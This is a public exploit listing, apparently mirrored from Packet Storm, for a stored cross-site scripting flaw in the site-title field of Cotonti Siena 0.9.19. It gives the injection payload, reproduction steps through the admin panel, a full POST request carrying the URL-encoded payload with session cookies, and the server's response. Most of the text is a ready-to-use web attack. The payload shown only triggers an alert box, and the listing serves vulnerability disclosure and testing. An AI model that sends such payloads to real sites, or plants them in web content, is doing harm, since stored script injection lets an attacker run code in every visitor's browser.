Exploit for Cotonti Siena 0.9.19 Cross Site Scripting

Name: Exploit for Cotonti Siena 0.9.19 Cross Site Scripting
Rating: 5 (154 reviews)
2021-06-16 | CVSS 0.1
## https://sploitus.com/exploit?id=PACKETSTORM:163177
# Exploit Title: Cotonti Siena 0.9.19 - 'maintitle' Stored Cross-Site Scripting  
# Date: 2021-15-06  
# Exploit Author: Fatih İLGİN  
# Vendor Homepage: cotonti.com  
# Vulnerable Software: https://www.cotonti.com/download/siena_0919  
# Affected Version: 0.9.19  
# Tested on: Windows 10  
  
# Vulnerable Parameter Type: POST  
# Vulnerable Parameter: maintitle  
# Attack Pattern: "><img src=1 href=1 onerror="javascript:alert(1)"></img>  
  
# Description  
  
1) Entering the Admin Panel (vulnerableapplication.com/cotonti/admin.php)  
2) Then go to Configuration tab and set payload ("><img src=1 href=1 onerror="javascript:alert(1)"></img>) for Site title param  
3) Then click Update button  
4) In the end, Go to home page then shown triggered vulnerability  
  
  
# Proof of Concepts  
  
Request;  
  
POST /cotonti/admin.php?m=config&n=edit&o=core&p=title&a=update HTTP/1.1  
Host: vulnerableapplication.com  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101  
Firefox/78.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 440  
Origin: https://vulnerableapplication.com  
Connection: close  
Referer:  
https://vulnerableapplication/cotonti/admin.php?m=config&n=edit&o=core&p=title  
Cookie:  
__cmpconsentx19318=CPH17mBPH17mBAfUmBENBeCsAP_AAH_AAAYgG9tf_X_fb3_j-_59__t0eY1f9_7_v-0zjheds-8Nyd_X_L8X_2M7vB36pr4KuR4ku3bBAQdtHOncTQmx6IlVqTPsb02Mr7NKJ7PEmlsbe2dYGH9_n9XT_ZKZ79_____7________77______3_v__9-BvbX_1_329_4_v-ff_7dHmNX_f-_7_tM44XnbPvDcnf1_y_F_9jO7wd-qa-CrkeJLt2wQEHbRzp3E0JseiJVakz7G9NjK-zSiezxJpbG3tnWBh_f5_V0_2Sme_f____-________--______9_7___fgAAA;  
__cmpcccx19318=aBPH17mCgAADAAXAA0AB4AQ4DiQKnAAA;  
_ga=GA1.2.1498194981.1623770561; _gid=GA1.2.1196246770.1623770561;  
__gads=ID=63f33aa9dd32c83c-220723d35ec800e9:T=1623770613:RT=1623770613:S=ALNI_MZ0ifDGVpIXuopc8JXvo208SRTYmA;  
PHPSESSID=ahmanvhckp2o5g5rnpr4cnj9c3  
  
&x=701dad27076b1d78&maintitle=%22%3E%3Cimg+src%3D1+href%3D1+onerror%3D%22javascript%3Aalert(1)%22%3E%3C%2Fimg%3E&subtitle=Subtitle&metakeywords=&title_users_details=%7BUSER%7D%3A+%7BNAME%7D&title_header=%7BSUBTITLE%7D+-+%7BMAINTITLE%7D&title_header_index=%7BMAINTITLE%7D+-+%7BDESCRIPTION%7D&subject_mail=%7BSITE_TITLE%7D+-+%7BMAIL_SUBJECT%7D&body_mail=%7BMAIL_BODY%7D%0D%0A%0D%0A%7BSITE_TITLE%7D+-+%7BSITE_URL%7D%0D%0A%7BSITE_DESCRIPTION%7D  
  
  
Response;  
  
HTTP/1.1 200 OK  
Date: Tue, 15 Jun 2021 16:07:59 GMT  
Server: Apache  
Expires: Mon, Apr 01 1974 00:00:00 GMT  
Cache-Control: no-store,no-cache,must-revalidate, post-check=0,pre-check=0  
Pragma: no-cache  
Last-Modified: Tue, 15 Jun 2021 04:07:59 GMT  
Vary: Accept-Encoding  
X-Robots-Tag: noindex,nofollow  
Content-Length: 4366  
Connection: close  
Content-Type: text/html; charset=UTF-8  
  
<h1 class="body"><a href="admin.php" title="Administration  
panel">Administration panel</a> / <a href="admin.php?m=config"  
title="Configuration">Configuration</a> / <a  
href="admin.php?m=config&n=edit&o=core&p=title" title="Titles  
and Metas">Titles and Metas</a></h1>  
  
<div id="main" class="body clear">  
<h2>Configuration</h2>  
<div class="done">  
<h4>Done</h4>  
<ul>  
<li>Updated</li>  
</ul>  
</div>